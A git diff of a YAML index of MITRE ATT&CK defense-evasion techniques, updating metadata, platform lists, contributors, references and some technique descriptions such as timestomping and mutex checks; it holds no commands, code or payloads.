       - Windows
-      - Office 365
       - IaaS
       - Linux
       - macOS
       - Containers
       - Network
-      x_mitre_version: '1.5'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.6'
       x_mitre_data_sources:
       - 'File: File Modification'
       - 'Cloud Service: Cloud Service Disable'
@@ -3472,15 +3544,17 @@ defense-evasion:
       - source_name: mitre-attack
         url: https://attack.mitre.org/techniques/T1562
         external_id: T1562
+      - source_name: Google Cloud Mandiant UNC3886 2024
+        description: " Punsaen Boonyakarn, Shawn Chew, Logeswaran Nadarajan, Mathew
+          Potaczek, Jakub Jozwiak, and Alex Marvi. (2024, June 18). Cloaked and Covert:
+          Uncovering UNC3886 Espionage Operations. Retrieved September 24, 2024."
+        url: https://cloud.google.com/blog/topics/threat-intelligence/uncovering-unc3886-espionage-operations
       - source_name: Emotet shutdown
         description: The DFIR Report. (2022, November 8). Emotet Strikes Again – LNK
           File Leads to Domain Wide Ransomware. Retrieved March 6, 2023.
         url: https://thedfirreport.com/2022/11/28/emotet-strikes-again-lnk-file-leads-to-domain-wide-ransomware/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.2.0
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562
     atomic_tests: []
   T1055.003:
@@ -3504,7 +3578,7 @@ defense-evasion:
           A Technical Survey Of Common And Trending Process Injection Techniques.
           Retrieved December 7, 2017.'
         source_name: Elastic Process Injection July 2017
-      modified: '2022-04-25T14:00:00.188Z'
+      modified: '2021-10-18T12:22:50.800Z'
       name: Thread Execution Hijacking
       description: "Adversaries may inject malicious code into hijacked processes
         in order to evade process-based defenses as well as possibly elevate privileges.
@@ -3552,13 +3626,11 @@ defense-evasion:
       - Anti-virus
       x_mitre_permissions_required:
       - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1055.003
     atomic_tests: []
   T1036:
     technique:
-      modified: '2024-03-08T17:00:59.133Z'
+      modified: '2024-10-16T20:10:38.450Z'
       name: Masquerading
       description: |-
         Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
@@ -3574,7 +3646,7 @@ defense-evasion:
       - Felipe Espósito, @Pr0teus
       - Elastic
       - Bartosz Jerzman
-      - Goldstein Menachem
+      - Menachem Goldstein
       x_mitre_deprecated: false
       x_mitre_detection: |-
         Collect file hashes; file names that do not match their expected hash are suspect. Perform file monitoring; files with known names but in unusual locations are suspect. Likewise, files that are modified outside of an update or patch are suspect.
@@ -3599,6 +3671,7 @@ defense-evasion:
       - 'Process: Process Creation'
       - 'Image: Image Metadata'
       - 'Scheduled Job: Scheduled Job Metadata'
+      - 'User Account: User Account Creation'
       - 'File: File Metadata'
       - 'Scheduled Job: Scheduled Job Modification'
       - 'Command: Command Execution'
@@ -3616,8 +3689,8 @@ defense-evasion:
         external_id: T1036
       - source_name: Twitter ItsReallyNick Masquerading Update
         description: Carr, N.. (2018, October 25). Nick Carr Status Update Masquerading.
-          Retrieved April 22, 2019.
-        url: https://twitter.com/ItsReallyNick/status/1055321652777619457
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/1055321652777619457
       - source_name: Elastic Masquerade Ball
         description: 'Ewing, P. (2016, October 31). How to Hunt: The Masquerade Ball.
           Retrieved October 31, 2016.'
@@ -3630,12 +3703,11 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1036
     atomic_tests: []
   T1070.008:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-10-15T15:43:56.839Z'
       name: 'Email Collection: Mailbox Manipulation'
       description: "Adversaries may modify mail and mail application data to remove
         evidence of their activity. Email applications allow users and other programs
@@ -3672,9 +3744,8 @@ defense-evasion:
       - Linux
       - macOS
       - Windows
-      - Office 365
-      - Google Workspace
-      x_mitre_version: '1.1'
+      - Office Suite
+      x_mitre_version: '1.2'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'File: File Deletion'
@@ -3712,14 +3783,13 @@ defense-evasion:
         url: https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1070.008
     atomic_tests: []
   T1055:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2023-03-30T21:01:45.488Z'
       name: Process Injection
       description: "Adversaries may inject code into processes in order to evade process-based
         defenses as well as possibly elevate privileges. Process injection is a method
@@ -3822,12 +3892,11 @@ defense-evasion:
         url: http://www.chokepoint.net/2014/02/detecting-userland-preload-rootkits.html
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      spec_version: '2.1'
       identifier: T1055
     atomic_tests: []
   T1205:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2022-10-19T23:08:40.603Z'
       name: Traffic Signaling
       description: |-
         Adversaries may use traffic signaling to hide open ports or other malicious functionality used for persistence or command and control. Traffic signaling involves the use of a magic value or sequence that must be sent to a system to trigger a special response, such as opening a closed port or executing a malicious task. This may take the form of sending a series of packets with certain characteristics before a port will be opened that the adversary can use for command and control. Usually this series of packets consists of attempted connections to a predefined sequence of closed ports (i.e. [Port Knocking](https://attack.mitre.org/techniques/T1205/001)), but can involve unusual flags, specific strings, or other unique characteristics. After the sequence is completed, opening a port may be accomplished by the host-based firewall, but could also be implemented by custom software.
@@ -3911,7 +3980,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1218:
     technique:
@@ -3978,60 +4046,77 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218
     atomic_tests: []
   T1070.006:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Romain Dumont, ESET
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
-      type: attack-pattern
-      created: '2020-01-31T12:42:44.103Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1070.006
-        url: https://attack.mitre.org/techniques/T1070/006
-      - url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
-        description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
-          of Anti-Forensics Techniques. Retrieved June 3, 2016.'
-        source_name: WindowsIR Anti-Forensic Techniques
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2024-09-30T15:14:56.021Z'
       name: 'Indicator Removal on Host: Timestomp'
       description: |-
-        Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
+        Adversaries may modify file time attributes to hide new files or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder and blend malicious files with legitimate files.
+
+        Both the `$STANDARD_INFORMATION` (`$SI`) and `$FILE_NAME` (`$FN`) attributes record times in a Master File Table (MFT) file.(Citation: Inversecos Timestomping 2022) `$SI` (dates/time stamps) is displayed to the end user, including in the File System view, while `$FN` is dealt with by the kernel.(Citation: Magnet Forensics)
+
+        Modifying the `$SI` attribute is the most common method of timestomping because it can be modified at the user level using API calls. `$FN` timestomping, however, typically requires interacting with the system kernel or moving or renaming a file.(Citation: Inversecos Timestomping 2022)
+
+        Adversaries modify timestamps on files so that they do not appear conspicuous to forensic investigators or file analysis tools. In order to evade detections that rely on identifying discrepancies between the `$SI` and `$FN` attributes, adversaries may also engage in “double timestomping” by modifying times on both attributes simultaneously.(Citation: Double Timestomping)
 
         Timestomping may be used along with file name [Masquerading](https://attack.mitre.org/techniques/T1036) to hide malware and tools.(Citation: WindowsIR Anti-Forensic Techniques)
       kill_chain_phases:
       - kill_chain_name: mitre-attack
         phase_name: defense-evasion
+      x_mitre_contributors:
+      - Romain Dumont, ESET
+      - Mike Hartley @mikehartley10
+      x_mitre_deprecated: false
       x_mitre_detection: 'Forensic techniques exist to detect aspects of files that
         have had their timestamps modified. (Citation: WindowsIR Anti-Forensic Techniques)
         It may be possible to detect timestomping using file modification monitoring
         that collects information on file handle opens and can compare timestamp values.'
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
-      x_mitre_version: '1.0'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
+      x_mitre_version: '1.1'
       x_mitre_data_sources:
+      - 'Process: OS API Execution'
       - 'File: File Modification'
       - 'File: File Metadata'
+      - 'Command: Command Execution'
       x_mitre_defense_bypassed:
       - Host forensic analysis
-      x_mitre_permissions_required:
-      - root
-      - SYSTEM
-      - User
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--47f2d673-ca62-47e9-929b-1b0be9657611
+      created: '2020-01-31T12:42:44.103Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1070/006
+        external_id: T1070.006
+      - source_name: WindowsIR Anti-Forensic Techniques
+        description: 'Carvey, H. (2013, July 23). HowTo: Determine/Detect the use
+          of Anti-Forensics Techniques. Retrieved June 3, 2016.'
+        url: http://windowsir.blogspot.com/2013/07/howto-determinedetect-use-of-anti.html
+      - source_name: Inversecos Timestomping 2022
+        description: 'Lina Lau. (2022, April 28). Defence Evasion Technique: Timestomping
+          Detection – NTFS Forensics. Retrieved September 30, 2024.'
+        url: https://www.inversecos.com/2022/04/defence-evasion-technique-timestomping.html
+      - source_name: Magnet Forensics
+        description: Magnet Forensics. (2020, August 24). Expose Evidence of Timestomping
+          with the NTFS Timestamp Mismatch Artifact. Retrieved June 20, 2024.
+        url: https://www.magnetforensics.com/blog/expose-evidence-of-timestomping-with-the-ntfs-timestamp-mismatch-artifact-in-magnet-axiom-4-4/
+      - source_name: Double Timestomping
+        description: Matthew Dunwoody. (2022, April 28). I have seen double-timestomping
+          ITW, including by APT29. Stay sharp out there.. Retrieved June 20, 2024.
+        url: https://x.com/matthewdunwoody/status/1519846657646604289
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1070.006
     atomic_tests: []
   T1620:
@@ -4134,9 +4219,76 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1620
     atomic_tests: []
+  T1480.002:
+    technique:
+      modified: '2024-10-28T16:22:25.431Z'
+      name: Mutual Exclusion
+      description: |-
+        Adversaries may constrain execution or actions based on the presence of a mutex associated with malware. A mutex is a locking mechanism used to synchronize access to a resource. Only one thread or process can acquire a mutex at a given time.(Citation: Microsoft Mutexes)
+
+        While local mutexes only exist within a given process, allowing multiple threads to synchronize access to a resource, system mutexes can be used to synchronize the activities of multiple processes.(Citation: Microsoft Mutexes) By creating a unique system mutex associated with a particular malware, adversaries can verify whether or not a system has already been compromised.(Citation: Sans Mutexes 2012)
+
+        In Linux environments, malware may instead attempt to acquire a lock on a mutex file. If the malware is able to acquire the lock, it continues to execute; if it fails, it exits to avoid creating a second instance of itself.(Citation: Intezer RedXOR 2021)(Citation: Deep Instinct BPFDoor 2023)
+
+        Mutex names may be hard-coded or dynamically generated using a predictable algorithm.(Citation: ICS Mutexes 2015)
+      kill_chain_phases:
+      - kill_chain_name: mitre-attack
+        phase_name: defense-evasion
+      x_mitre_contributors:
+      - Manikantan Srinivasan, NEC Corporation India
+      - Pooja Natarajan, NEC Corporation India
+      - Nagahama Hiroki – NEC Corporation Japan
+      x_mitre_deprecated: false
+      x_mitre_detection: ''
+      x_mitre_domains:
+      - enterprise-attack
+      x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Windows
+      - Linux
+      - macOS
+      x_mitre_version: '1.0'
+      x_mitre_data_sources:
+      - 'Process: OS API Execution'
+      - 'File: File Creation'
+      type: attack-pattern
+      id: attack-pattern--49fca0d2-685d-41eb-8bd4-05451cc3a742
+      created: '2024-09-19T14:00:03.401Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1480/002
+        external_id: T1480.002
+      - source_name: Intezer RedXOR 2021
+        description: Joakim Kennedy and Avigayil Mechtinger. (2021, March 10). New
+          Linux Backdoor RedXOR Likely Operated by Chinese Nation-State Actor. Retrieved
+          September 19, 2024.
+        url: https://intezer.com/blog/malware-analysis/new-linux-backdoor-redxor-likely-operated-by-chinese-nation-state-actor/
+      - source_name: Sans Mutexes 2012
+        description: Lenny Zeltser. (2012, July 24). Looking at Mutex Objects for
+          Malware Discovery & Indicators of Compromise. Retrieved September 19, 2024.
+        url: https://www.sans.org/blog/looking-at-mutex-objects-for-malware-discovery-indicators-of-compromise/
+      - source_name: ICS Mutexes 2015
+        description: Lenny Zeltser. (2015, March 9). How Malware Generates Mutex Names
+          to Evade Detection. Retrieved September 19, 2024.
+        url: https://isc.sans.edu/diary/How+Malware+Generates+Mutex+Names+to+Evade+Detection/19429/
+      - source_name: Microsoft Mutexes
+        description: Microsoft. (2022, March 11). Mutexes. Retrieved September 19,
+          2024.
+        url: https://learn.microsoft.com/en-us/dotnet/standard/threading/mutexes
+      - source_name: Deep Instinct BPFDoor 2023
+        description: Shaul Vilkomir-Preisman and Eliran Nissan. (2023, May 10). BPFDoor
+          Malware Evolves – Stealthy Sniffing Backdoor Ups Its Game. Retrieved September
+          19, 2024.
+        url: https://www.deepinstinct.com/blog/bpfdoor-malware-evolves-stealthy-sniffing-backdoor-ups-its-game
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+    atomic_tests: []
   T1564.011:
     technique:
       modified: '2023-11-06T20:14:51.609Z'
@@ -4200,57 +4352,10 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1497.003:
     technique:
-      x_mitre_platforms:
-      - Linux
-      - macOS
-      - Windows
-      x_mitre_domains:
-      - enterprise-attack
-      x_mitre_contributors:
-      - Jorge Orchilles, SCYTHE
-      - Ruben Dodge, @shotgunner101
-      - Jeff Felling, Red Canary
-      - Deloitte Threat Library Team
-      object_marking_refs:
-      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
-      type: attack-pattern
-      created: '2020-03-06T21:11:11.225Z'
-      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      external_references:
-      - source_name: mitre-attack
-        external_id: T1497.003
-        url: https://attack.mitre.org/techniques/T1497/003
-      - source_name: Deloitte Environment Awareness
-        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc
-        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
-          May 18, 2021.
-      - source_name: Revil Independence Day
-        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
-        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
-          supply chain exploit to attack hundreds of businesses. Retrieved September
-          30, 2021.'
-      - source_name: Netskope Nitol
-        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
-        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
-          with evasive sandbox analysis technique. Retrieved September 30, 2021.
-      - source_name: Joe Sec Nymaim
-        url: https://www.joesecurity.org/blog/3660886847485093803
-        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
-          API hammering. Retrieved September 30, 2021.
-      - source_name: Joe Sec Trickbot
-        url: https://www.joesecurity.org/blog/498839998833561473
-        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
-          Retrieved September 30, 2021.
-      - source_name: ISACA Malware Tricks
-        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
-        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
-          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2024-09-12T15:50:18.048Z'
       name: Time Based Evasion
       description: |-
         Adversaries may employ various time-based methods to detect and avoid virtualization and analysis environments. This may include enumerating time-based properties, such as uptime or the system clock, as well as the use of timers or other triggers to avoid a virtual machine environment (VME) or sandbox, specifically those that are automated or only operate for a limited amount of time.
@@ -4265,6 +4370,12 @@ defense-evasion:
         phase_name: defense-evasion
       - kill_chain_name: mitre-attack
         phase_name: discovery
+      x_mitre_contributors:
+      - Jorge Orchilles, SCYTHE
+      - Ruben Dodge, @shotgunner101
+      - Jeff Felling, Red Canary
+      - Deloitte Threat Library Team
+      x_mitre_deprecated: false
       x_mitre_detection: 'Time-based evasion will likely occur in the first steps
         of an operation but may also occur throughout as an adversary learns the environment.
         Data and events should not be viewed in isolation, but as part of a chain
@@ -4274,9 +4385,14 @@ defense-evasion:
         implementation and monitoring required. Monitoring for suspicious processes
         being spawned that gather a variety of system information or perform other
         forms of Discovery, especially in a short period of time, may aid in detection. '
+      x_mitre_domains:
+      - enterprise-attack
       x_mitre_is_subtechnique: true
+      x_mitre_platforms:
+      - Linux
+      - macOS
+      - Windows
       x_mitre_version: '1.2'
-      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       x_mitre_data_sources:
       - 'Process: OS API Execution'
       - 'Process: Process Creation'
@@ -4286,13 +4402,49 @@ defense-evasion:
       - Signature-based detection
       - Static File Analysis
       - Anti-virus
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
+      type: attack-pattern
+      id: attack-pattern--4bed873f-0b7d-41d4-b93a-b6905d1f90b0
+      created: '2020-03-06T21:11:11.225Z'
+      created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+      revoked: false
+      external_references:
+      - source_name: mitre-attack
+        url: https://attack.mitre.org/techniques/T1497/003
+        external_id: T1497.003
+      - source_name: Joe Sec Nymaim
+        description: Joe Security. (2016, April 21). Nymaim - evading Sandboxes with
+          API hammering. Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/3660886847485093803
+      - source_name: Joe Sec Trickbot
+        description: Joe Security. (2020, July 13). TrickBot's new API-Hammering explained.
+          Retrieved September 30, 2021.
+        url: https://www.joesecurity.org/blog/498839998833561473
+      - source_name: ISACA Malware Tricks
+        description: 'Kolbitsch, C. (2017, November 1). Evasive Malware Tricks: How
+          Malware Evades Detection by Sandboxes. Retrieved March 30, 2021.'
+        url: https://www.isaca.org/resources/isaca-journal/issues/2017/volume-6/evasive-malware-tricks-how-malware-evades-detection-by-sandboxes
+      - source_name: Revil Independence Day
+        description: 'Loman, M. et al. (2021, July 4). Independence Day: REvil uses
+          supply chain exploit to attack hundreds of businesses. Retrieved September
+          30, 2021.'
+        url: https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/
+      - source_name: Netskope Nitol
+        description: Malik, A. (2016, October 14). Nitol Botnet makes a resurgence
+          with evasive sandbox analysis technique. Retrieved September 30, 2021.
+        url: https://www.netskope.com/blog/nitol-botnet-makes-resurgence-evasive-sandbox-analysis-technique
+      - source_name: Deloitte Environment Awareness
+        description: Torello, A. & Guibernau, F. (n.d.). Environment Awareness. Retrieved
+          September 13, 2024.
+        url: https://drive.google.com/file/d/1t0jn3xr4ff2fR30oQAUn_RsWSnMpOAQc/edit
+      object_marking_refs:
+      - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+      x_mitre_attack_spec_version: 3.2.0
+      x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1497.003
     atomic_tests: []
   T1218.003:
     technique:
-      modified: '2023-05-09T14:00:00.188Z'
+      modified: '2024-09-12T19:35:43.077Z'
       name: 'Signed Binary Proxy Execution: CMSTP'
       description: |-
         Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections.
@@ -4338,8 +4490,8 @@ defense-evasion:
         external_id: T1218.003
       - source_name: Twitter CMSTP Usage Jan 2018
         description: Carr, N. (2018, January 31). Here is some early bad cmstp.exe...
-          Retrieved April 11, 2018.
-        url: https://twitter.com/ItsReallyNick/status/958789644165894146
+          Retrieved September 12, 2024.
+        url: https://x.com/ItsReallyNick/status/958789644165894146
       - source_name: Microsoft Connection Manager Oct 2009
         description: Microsoft. (2009, October 8). How Connection Manager Works. Retrieved
           April 11, 2018.
@@ -4358,13 +4510,12 @@ defense-evasion:
         url: http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/
       - source_name: Twitter CMSTP Jan 2018
         description: Tyrer, N. (2018, January 30). CMSTP.exe - remote .sct execution
-          applocker bypass. Retrieved April 11, 2018.
-        url: https://twitter.com/NickTyrer/status/958450014111633408
+          applocker bypass. Retrieved September 12, 2024.
+        url: https://x.com/NickTyrer/status/958450014111633408
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
-      x_mitre_attack_spec_version: 3.1.0
+      x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1218.003
     atomic_tests: []
   T1562.002:
@@ -4479,7 +4630,6 @@ defense-evasion:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.002
     atomic_tests: []
   T1218.002:
@@ -4520,7 +4670,7 @@ defense-evasion:
         url: https://www.welivesecurity.com/wp-content/uploads/2020/06/ESET_InvisiMole.pdf
         description: 'Hromcova, Z. and Cherpanov, A. (2020, June). INVISIMOLE: THE
           HIDDEN PART OF THE STORY. Retrieved July 16, 2020.'
-      modified: '2022-05-11T14:00:00.188Z'
+      modified: '2022-03-11T19:01:55.821Z'
       name: 'Signed Binary Proxy Execution: Control Panel'
       description: |-
         Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings.
@@ -4559,8 +4709,6 @@ defense-evasion:
       - User
       - Administrator
       - SYSTEM
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
       identifier: T1218.002
     atomic_tests: []
   T1599.001:
@@ -4583,7 +4731,7 @@ defense-evasion:
         url: https://tools.ietf.org/html/rfc1918
         description: IETF Network Working Group. (1996, February). Address Allocation
           for Private Internets. Retrieved October 20, 2020.
-      modified: '2021-04-29T14:49:39.188Z'
+      modified: '2020-10-21T01:45:58.951Z'
       name: Network Address Translation Traversal
       description: "Adversaries may bridge network boundaries by modifying a network
         device’s Network Address Translation (NAT) configuration. Malicious modifications
@@ -4622,12 +4770,10 @@ defense-evasion:
       - 'Network Traffic: Network Traffic Content'
       x_mitre_permissions_required:
       - Administrator
-      spec_version: '2.1'
-      x_mitre_attack_spec_version: 2.1.0
     atomic_tests: []
   T1550:
     technique:
-      modified: '2024-04-12T21:18:23.798Z'
+      modified: '2024-10-15T16:09:19.001Z'
       name: Use Alternate Authentication Material
       description: "Adversaries may use alternate authentication material, such as
         password hashes, Kerberos tickets, and application access tokens, in order
@@ -4654,6 +4800,7 @@ defense-evasion:
         phase_name: lateral-movement
       x_mitre_contributors:
       - Blake Strom, Microsoft Threat Intelligence
+      - Pawel Partyka, Microsoft Threat Intelligence
       x_mitre_deprecated: false
       x_mitre_detection: 'Configure robust, consistent account activity audit policies
         across the enterprise and with externally accessible services.(Citation: TechNet
@@ -4671,12 +4818,12 @@ defense-evasion:
       x_mitre_is_subtechnique: false
       x_mitre_platforms:
       - Windows
-      - Office 365
       - SaaS
-      - Google Workspace
       - IaaS
       - Containers
-      x_mitre_version: '1.3'
+      - Identity Provider
+      - Office Suite
+      x_mitre_version: '1.4'
       x_mitre_data_sources:
       - 'Application Log: Application Log Content'
       - 'Logon Session: Logon Session Creation'
@@ -4702,18 +4849,17 @@ defense-evasion:
         description: NIST. (n.d.). Authentication. Retrieved January 30, 2020.
         url: https://csrc.nist.gov/glossary/term/authentication
       - source_name: NIST MFA
-        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved January
-          30, 2020.
-        url: https://csrc.nist.gov/glossary/term/Multi_Factor-Authentication
+        description: NIST. (n.d.). Multi-Factor Authentication (MFA). Retrieved September
+          25, 2024.
+        url: https://csrc.nist.gov/glossary/term/multi_factor_authentication
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
     atomic_tests: []
   T1562.004:
     technique:
-      modified: '2024-03-28T00:01:08.337Z'
+      modified: '2024-09-12T19:37:57.867Z'
       name: 'Impair Defenses: Disable or Modify System Firewall'
       description: |-
         Adversaries may disable or modify system firewalls in order to bypass controls limiting network usage. Changes could be disabling the entire mechanism as well as adding, deleting, or modifying particular rules. This can be done numerous ways depending on the operating system, including via command-line, editing Windows Registry keys, and Windows Control Panel.
@@ -4758,13 +4904,12 @@ defense-evasion:
         url: https://www.huntress.com/blog/blackcat-ransomware-affiliate-ttps
       - source_name: change_rdp_port_conti
         description: 'The DFIR Report. (2022, March 1). "Change RDP port" #ContiLeaks.
-          Retrieved March 1, 2022.'
-        url: https://twitter.com/TheDFIRReport/status/1498657772254240768
+          Retrieved September 12, 2024.'
+        url: https://x.com/TheDFIRReport/status/1498657772254240768
       object_marking_refs:
       - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
       x_mitre_attack_spec_version: 3.2.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1562.004
     atomic_tests: []
   T1553.003:
@@ -4836,7 +4981,7 @@ defense-evasion:
         * **Note:** The above hijacks are also possible without modifying the Registry via [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).
 
         Hijacking SIP or trust provider components can also enable persistent code execution, since these malicious components may be invoked by any application that performs code signing or signature validation. (Citation: SpectorOps Subverting Trust Sept 2017)
-      modified: '2022-05-24T14:00:00.188Z'
+      modified: '2022-05-05T04:58:58.214Z'
       created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       name: 'Subvert Trust Controls: SIP and Trust Provider Hijacking'
       x_mitre_detection: |-
@@ -4869,35 +5014,34 @@ defense-evasion:
       - Application Control
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
-      spec_version: '2.1'
       identifier: T1553.003
     atomic_tests: []
   T1556.007:
     technique:
-      modified: '2022-11-08T14:00:00.188Z'
+      modified: '2024-10-14T22:11:30.271Z'
       name: Hybrid Identity
       description: "Adversaries may patch, modify, or otherwise backdoor cloud authentication
         processes that are tied to on-premises user identities in order to bypass
         typical authentication mechanisms, access credentials, and enable persistent
